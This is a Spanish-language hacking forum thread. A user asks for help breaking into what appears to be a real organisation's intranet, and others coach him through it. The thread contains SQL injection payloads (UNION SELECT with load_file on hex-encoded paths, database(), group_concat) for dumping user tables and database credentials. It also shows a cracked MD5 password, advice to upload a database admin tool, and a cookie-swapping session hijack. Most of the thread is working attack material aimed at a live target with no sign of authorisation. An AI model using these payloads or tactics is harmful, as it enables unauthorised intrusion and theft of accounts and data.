 Autor
|
Tema: Ayuda Mmm... (Leído 2,907 veces)
|
Wifox
 Desconectado
Mensajes: 7
|
Estaba intenta ingresar una web solo por el afan de aprender xD Me ayude con un video de youtube... Pero al cargar el archivo intranetapp/admin/index.php por medio de load_file(... me manda lo siguiente // Carga el archivo de definiciones
include_once ('_conexion.php');
$error = "";
setcookie("s_usuarioyo[un]");
if (isset($_POST["user"])){
$query = "select * from usuarios where usuario = '$_POST[user]'";
$result = mysql_query($query, $link);
if (mysql_num_rows($result) == 0) {
$error = "El Usuario No Existe"; }
else {
$rs = mysql_fetch_array($result);
if ($rs["clave"] != md5($HTTP_POST_VARS["pass"])) {
$error = "Password Incorrecto"; }
else {
if ($rs[estado] == '0') {
$error = "Usuario Desactivado"; }
else {
$sql2 = "SELECT max(codigo) as maximo from auditoria";
$results = mysql_query($sql2,$link);
$rs2 = mysql_fetch_array($results);
$nucod=$rs2[maximo]+1;
$nucod=str_pad($nucod,4,"0",STR_PAD_LEFT);
$fechasesion=date("Y/m/d");
$horainicio=date("h:i:s");
$sql2 = "insert into auditoria (codigo,usuario,fecha_sesion,hora_inicio) values ('$nucod','$HTTP_POST_VARS[user]','$fechasesion','$horainicio')";
mysql_query($sql2,$link);
session_start();
setcookie('s_usuarioyo[un]', $HTTP_POST_VARS["user"]);
setcookie('s_usuarioyo[ut]', $rs[tipousuario]);
setcookie('s_usuarioyo[nc]', $nucod);
if ($rs[tipousuario] == 'o') {
header("Location:padron.php");}
else {
header("Location:padron.php");}
}
}
}
}
if ($_GET[salir]!=""){
$horafin=date("h:i:s");
$sql2 = "update auditoria set hora_fin='$horafin' where codigo='$_GET[salir]'";
mysql_query($sql2,$link);
}
?> se que la tabla de usuario es usuario xd pero la password nose entonces si me pudieran ayudar xd Pd: union select 1,2,3,4,load_file(0x433a2f77616d702f7777772f68746d6c312f6172636869766f732f696e7472616e65746170702f61646d696e2f696e6465782e706870),6,7,8,9,0/* |
|
|
|
|
En línea
|
|
|
|
Azielito
no es
Colaborador
Desconectado
Mensajes: 9.188
>.<
|
Ya tienes como cargar archivos, carga ahora "_conexion.php" 433a2f77616d702f7777772f68746d6c312f6172636869766f732f696e7472616e65746170702f61646d696e2f5f636f6e6578696f6e2e706870 Para ver usuario y contraseña de la base de datos, y luego intenta conectarte a la base de datos via remoto, si no se puede intenta subir el phpminiadmin para entrar a la base de datos '_' |
|
|
|
|
En línea
|
|
|
|
|
WHK
|
union select 1,2,3,4,usuario,clave,7,8,9,0 from basededatos.usuarios /*
donde basededatos es el nombre de la base de datos que sacas con
union select 1,2,3,4,database(),6,7,8,9,0 /*
Si te limita a una sola columna le vas dando limit 1 y vas seleccionando user por user
|
|
|
|
|
En línea
|
|
|
|
08l00D
Desconectado
Mensajes: 168
|
se que la tabla de usuario es usuario xd pero la password nose La tabla de usuarios es usuarios no usuario.. usuario es el nombre de la columna igual que clave... WHK ya te dio la inyeccion completa asi que lo unico te toca sacar el username y la password en md5... solo una cosa si tienes varios usuarios admin, y quieres ir viendo todos en ves de limit podes usar group_concat(usuario,0x3a,clave) ... Saludos..
|
|
|
|
|
En línea
|
|
|
|
Wifox
Desconectado
Mensajes: 7
|
union select 1,2,3,4,usuario,clave,7,8,9,0 from basededatos.usuarios /*
donde basededatos es el nombre de la base de datos que sacas con
union select 1,2,3,4,database(),6,7,8,9,0 /*
Si te limita a una sola columna le vas dando limit 1 y vas seleccionando user por user
 see me resulto pero hay un problema, creo que me manda la clave md5  a95238df9190e26ce56f7f95bc51d229 el usuario no tiene problemas, no saben de un crack de md5?
|
|
|
|
|
En línea
|
|
|
|
Wifox
Desconectado
Mensajes: 7
|
vengo denuevo xd la password era "holitas" pero cunado la probe me decia usuario desactivado  entonces no se puede?  |
|
|
|
|
En línea
|
|
|
|
|
WHK
|
entra como un usuario normal y cheka tus cookies, reemplaza tu pass normal por el pass del otro usuario, no necesitas crackear nada..
por ejemplo si tu cookie es:
id:1:pass:hgfdf5465df465df4g86f
entonces sacas los datos de la otra persona y reemplazas tus datos por los de el y ya, refrescas el navegador y ya tomaste poder de su sesión.
|
|
|
|
|
En línea
|
|
|
|
|
 |
- 